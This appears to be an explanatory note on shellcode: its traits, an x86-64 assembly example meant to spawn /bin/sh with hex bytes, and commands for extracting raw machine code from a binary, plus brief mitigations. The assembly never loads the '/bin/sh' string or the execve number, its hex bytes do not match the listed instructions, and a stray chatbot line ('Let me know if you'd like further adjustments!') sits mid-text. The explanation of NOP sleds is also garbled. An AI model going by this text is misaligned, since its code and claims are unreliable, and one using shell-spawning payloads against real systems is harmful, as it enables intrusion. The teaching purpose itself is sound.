Shellcode is a small piece of machine code designed to execute specific tasks, often as part of an exploit to gain control over a program or system. It is called “shellcode” because it originally referred to code that spawns a shell (e.g., /bin/sh) to provide an attacker with command-line access. However, the term has evolved, and now it broadly refers to any standalone, payload-specific machine code.

Characteristics of Shellcode

  1. Compact: Shellcode is designed to be as small as possible to fit into constrained memory areas, such as buffers exploited in a vulnerability.
  2. Self-contained: It typically does not rely on external libraries or functions but may invoke system calls directly.
  3. Position-independent: Shellcode often uses relative addressing to ensure it works regardless of where it is loaded into memory.
  4. Raw machine code: Shellcode is pure machine instructions and does not include any metadata, headers, or higher-level constructs like those in an ELF or PE file.

Shellcode is most commonly used in scenarios involving exploitation of vulnerabilities, particularly in cases like buffer overflows or memory corruption, to execute arbitrary code. They are widely employed in penetration testing tool that crafts and deploy a variety of shellcodes. In embedded systems or restricted computing platform, they are used to execute specific tasks directly on hardware or software

Tip

A typical usage of shellcode is to spawn a shell, escalate privileges, or download and execute additional malicious code

Examples

Linux Shellcode to Spawn a Shell

Here is an example of simple x86-64 shellcode to spawn a /bin/sh shell by invoking the execve syscall directly:

Assembly

section .text
global _start
 
_start:
    xor rax, rax            ; Clear rax
    push rax                ; Null-terminate the string
    mov rdi, rsp            ; Set rdi (first arg: /bin/sh string pointer)
    mov rsi, rax            ; Set rsi (second arg: argv = NULL)
    mov rdx, rax            ; Set rdx (third arg: envp = NULL)
    mov rdi, rsp            ; Pointer to "/bin/sh"
    syscall                 ; Invoke the syscall

The corresponding machine code (in hex):

48 31 c0 50 48 89 e7 48 89 c6 48 89 d2 b8 3b 00 00 00 0f 05

Example: creating a shellcode from an executable

To create a shellcode, you often start with a compiled binary, strip unnecessary metadata, and extract the raw executable instructions. For instance, after compiling a simple program in written in low level Rust, you can strip the resulting binary to remove debug symbols and other non-essential data using strip. Next, you convert the stripped binary into a raw binary format using objcopy, which removes ELF headers and other metadata, leaving only the machine code. The resulting raw binary can then be disassembled using objdump to analyze its instructions. For example, with the following commands:

strip -s hello_world/target/release/hello_world
objcopy -O binary hello_world/target/release/hello_world shellcode.bin
objdump -D -b binary -mi386 -Mx86-64 -Mintel -z shellcode.bin

The disassembly output shows a three-column format: memory offsets on the left, machine code (hexadecimal bytes) in the middle, and assembly instructions on the right. Each assembly instruction is translated from its corresponding machine code bytes using the CPU architecture’s encoding rules. These raw instructions are what make up the shellcode. For details on interpreting disassembly output and the role of flags like -b, -m, and -M, see the Disassemblying note.

This process demonstrates the transformation from high-level code to stripped-down machine instructions suitable for use as shellcode, which can then be executed in contexts such as testing exploits or running specific payloads.


Let me know if you’d like further adjustments!

Shellcode and Security

Detection and Prevention: Modern systems employ techniques like ASLR, DEP, and stack canaries to detect and mitigate shellcode execution. However, attackers often counter these defenses with techniques like:

  • NOP sleds: Padding shellcode with NOP instructions to make its location predictable.
  • Return-Oriented Programming (ROP): Leveraging existing code in memory to execute payloads.